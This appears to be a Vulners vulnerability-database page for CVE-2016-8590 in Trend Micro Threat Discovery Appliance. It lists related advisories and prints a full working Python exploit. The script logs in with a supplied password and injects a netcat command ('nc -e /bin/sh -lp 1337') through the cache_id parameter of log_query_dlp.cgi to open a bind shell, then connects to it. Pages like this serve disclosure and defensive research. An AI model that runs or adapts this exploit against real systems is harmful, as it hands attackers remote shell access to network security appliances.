Vulners
Lucene search
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability (CVE-2016-8590)
| Reporter | Title | Published | Views | Family All 30 |
|---|---|---|---|---|
 | Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dlp.cgi Remote Code Execution Exploit | 20 Apr 201700:00 | – | zdt |
| Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dae.cgi Remote Code Execution Exploit | 20 Apr 201700:00 | – | zdt |
| Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Exploit | 20 Apr 201700:00 | – | zdt |
 | CVE-2016-7552 | 12 Apr 201710:59 | – | attackerkb |
 | CVE-2016-7552 | 29 May 201815:50 | – | circl |
 | Trend Micro Threat Discovery Appliance Arbitrary Code Execution Vulnerability (CNVD-2017-06834) | 3 May 201700:00 | – | cnvd |
| Trend Micro Threat Discovery Appliance Directory Traversal Vulnerability (CNVD-2017-10698) | 24 May 201700:00 | – | cnvd |
 | Trendmicro Threat Discovery Appliance Directory Traversal (CVE-2016-7552) | 22 Dec 202000:00 | – | checkpoint_advisories |
 | CVE-2016-7552 | 12 Apr 201710:00 | – | cve |
| CVE-2016-8590 | 28 Apr 201719:00 | – | cve |
10
import re
import os
import sys
import time
import requests
import threading
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 3:
print "(+) usage: %s <target> <pass>" % sys.argv[0]
print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
p = sys.argv[2]
bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
e_url = "%scgi-bin/log_query_dlp.cgi" % bu
s = requests.Session()
def exec_bd(s, e_url):
# now we setup our backdoor
# no reverse, since it seems to fail !?
netcat = "test|`nc -e /bin/sh -lp 1337`"
e_url += "?act=search_advanced&cache_id=%s" % netcat
s.get(e_url, verify=False)
# first we login...
r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
print "(+) logged in..."
thread = threading.Thread(target=exec_bd, args=(s, e_url,))
thread.start()
print "(+) starting backdoor, this will take a few secs..."
time.sleep(4)
print "(+) calling backdoor!"
os.system("nc %s 1337" % t)
else:
print "(-) login failed"
sys.exit(-1)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Apr 2017 00:00Current
10.1High risk
Vulners AI Score10.1
EPSS0.92979